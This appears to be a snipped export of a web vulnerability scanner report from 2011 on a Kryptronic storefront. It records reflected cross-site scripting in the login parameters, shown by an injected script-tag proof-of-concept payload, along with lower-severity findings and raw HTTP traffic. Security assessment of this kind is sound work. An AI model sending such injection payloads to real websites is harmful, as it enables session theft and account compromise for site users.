1. Cross-site scripting (reflected)
1.1. https://www.kryptronic.com/index.php [core--login--password parameter]
1.2. https://www.kryptronic.com/index.php [core--login--user parameter]
2. Password field with autocomplete enabled
3. Cross-domain Referer leakage
4. Cross-domain script include
6. Content type incorrectly stated
Severity: | High |
Confidence: | Certain |
Host: | https://www.kryptronic |
Path: | /index.php |
GET /index.php?sid=jvvn1 Host: www.kryptronic.com Connection: keep-alive Referer: https://www.kryptronic Cache-Control: max-age=0 Origin: https://www.kryptronic User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=jvvn13b961041006 |
HTTP/1.1 200 OK Date: Wed, 27 Apr 2011 21:28:22 GMT Server: Apache Pragma: no-cache Cache-Control: must-revalidate Expires: Wed, 27 Apr 2011 20:28:22 GMT Content-Length: 27740 Last-Modified: Wed, 27 Apr 2011 21:28:22 GMT X-Powered-By: Kryptronic/7.1.0 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content-ty ...[SNIP]... <input class="formfield" type="password" name="core--login- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.kryptronic |
Path: | /index.php |
GET /index.php?sid=jvvn1 Host: www.kryptronic.com Connection: keep-alive Referer: https://www.kryptronic Cache-Control: max-age=0 Origin: https://www.kryptronic User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=jvvn13b961041006 |
HTTP/1.1 200 OK Date: Wed, 27 Apr 2011 21:28:05 GMT Server: Apache Pragma: no-cache Cache-Control: must-revalidate Expires: Wed, 27 Apr 2011 20:28:06 GMT Content-Length: 27848 Last-Modified: Wed, 27 Apr 2011 21:28:06 GMT X-Powered-By: Kryptronic/7.1.0 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content-ty ...[SNIP]... <input class="formfield" type="text" name="core--login--user" id="core--login--user" value="90215"><script>alert(1)< ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | https://www.kryptronic |
Path: | /index.php |
GET /index.php?app=cms&ns Host: www.kryptronic.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=jvvn13b961041006 |
HTTP/1.1 200 OK Date: Wed, 27 Apr 2011 21:20:19 GMT Server: Apache Pragma: no-cache Cache-Control: must-revalidate Expires: Wed, 27 Apr 2011 20:20:20 GMT Content-Length: 26731 Last-Modified: Wed, 27 Apr 2011 21:20:20 GMT X-Powered-By: Kryptronic/7.1.0 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content-ty ...[SNIP]... </p> <form action="https://www <p class="hidden"> ...[SNIP]... </p> <input class="formfield" type="password" name="core--login- </fieldset> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.kryptronic |
Path: | /index.php |
GET /index.php?app=cms&ns Host: www.kryptronic.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=jvvn13b961041006 |
HTTP/1.1 200 OK Date: Wed, 27 Apr 2011 21:20:19 GMT Server: Apache Pragma: no-cache Cache-Control: must-revalidate Expires: Wed, 27 Apr 2011 20:20:20 GMT Content-Length: 26731 Last-Modified: Wed, 27 Apr 2011 21:20:20 GMT X-Powered-By: Kryptronic/7.1.0 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content-ty ...[SNIP]... <link rel="stylesheet" type="text/css" media="all" href="skins/KRYPTRONIC <script type="text/javascript" src="https://ssl.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.kryptronic |
Path: | /index.php |
GET /index.php?app=cms&ns Host: www.kryptronic.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=jvvn13b961041006 |
HTTP/1.1 200 OK Date: Wed, 27 Apr 2011 21:20:19 GMT Server: Apache Pragma: no-cache Cache-Control: must-revalidate Expires: Wed, 27 Apr 2011 20:20:20 GMT Content-Length: 26731 Last-Modified: Wed, 27 Apr 2011 21:20:20 GMT X-Powered-By: Kryptronic/7.1.0 Connection: close Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <meta http-equiv="content-ty ...[SNIP]... <link rel="stylesheet" type="text/css" media="all" href="skins/KRYPTRONIC <script type="text/javascript" src="https://ssl.google ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.kryptronic |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.kryptronic.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=jvvn13b961041006 |
HTTP/1.1 200 OK Date: Wed, 27 Apr 2011 21:20:29 GMT Server: Apache Last-Modified: Wed, 27 Aug 2008 18:50:17 GMT ETag: "57e-7dcd8c40" Accept-Ranges: bytes Content-Length: 1406 Connection: close Content-Type: text/plain ..............h.......(.. ...[SNIP]... |
Severity: | Information |
Confidence: | Firm |
Host: | https://www.kryptronic |
Path: | /favicon.ico |
GET /favicon.ico HTTP/1.1 Host: www.kryptronic.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sid=jvvn13b961041006 |
HTTP/1.1 200 OK Date: Wed, 27 Apr 2011 21:20:29 GMT Server: Apache Last-Modified: Wed, 27 Aug 2008 18:50:17 GMT ETag: "57e-7dcd8c40" Accept-Ranges: bytes Content-Length: 1406 Connection: close Content-Type: text/plain ..............h.......(.. ...[SNIP]... |